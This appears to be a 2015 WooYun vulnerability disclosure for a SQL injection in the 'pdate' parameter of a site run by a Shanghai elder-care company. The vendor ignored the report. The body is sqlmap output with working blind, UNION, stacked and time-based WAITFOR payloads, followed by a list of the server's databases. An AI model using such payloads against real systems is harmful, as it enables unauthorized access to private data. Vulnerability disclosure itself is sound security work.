漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0150155
漏洞标题:老来宝某站点时间盲注一枚
相关厂商:上海旭日养老服务有限公司
漏洞作者: 路人甲
提交时间:2015-10-29 00:04
修复时间:2015-11-03 00:06
公开时间:2015-11-03 00:06
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-10-29: 细节已通知厂商并且等待厂商处理中
2015-11-03: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
rt
详细说明:
sqlmap identified the following injection points with a total of 52 HTTP(s) requ
ests:
---
Place: GET
Parameter: pdate
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pdate=2015-08-10' AND 9040=9040 AND 'SKCN'='SKCN
Vector: AND [INFERENCE]
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: pdate=2015-08-10' UNION ALL SELECT NULL, NULL, NULL, CHAR(58)+CHAR(
116)+CHAR(120)+CHAR(107)+CHAR(58)+CHAR(114)+CHAR(107)+CHAR(80)+CHAR(98)+CHAR(115
)+CHAR(81)+CHAR(118)+CHAR(68)+CHAR(102)+CHAR(104)+CHAR(58)+CHAR(120)+CHAR(107)+C
HAR(114)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--
Vector: UNION ALL SELECT NULL, NULL, NULL, [QUERY], NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: pdate=2015-08-10'; WAITFOR DELAY '0:0:5';--
Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: pdate=2015-08-10' WAITFOR DELAY '0:0:5'--
Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
漏洞证明:
available databases [11]:
[*] gm_hejiashan
[*] laolaibao
[*] master
[*] model
[*] msdb
[*] nhWeiNong
[*] tempdb
[*] Test
[*] watchSpace
[*] WeixinApi
[*] Yongjiu
修复方案:
改
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-11-03 00:06
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无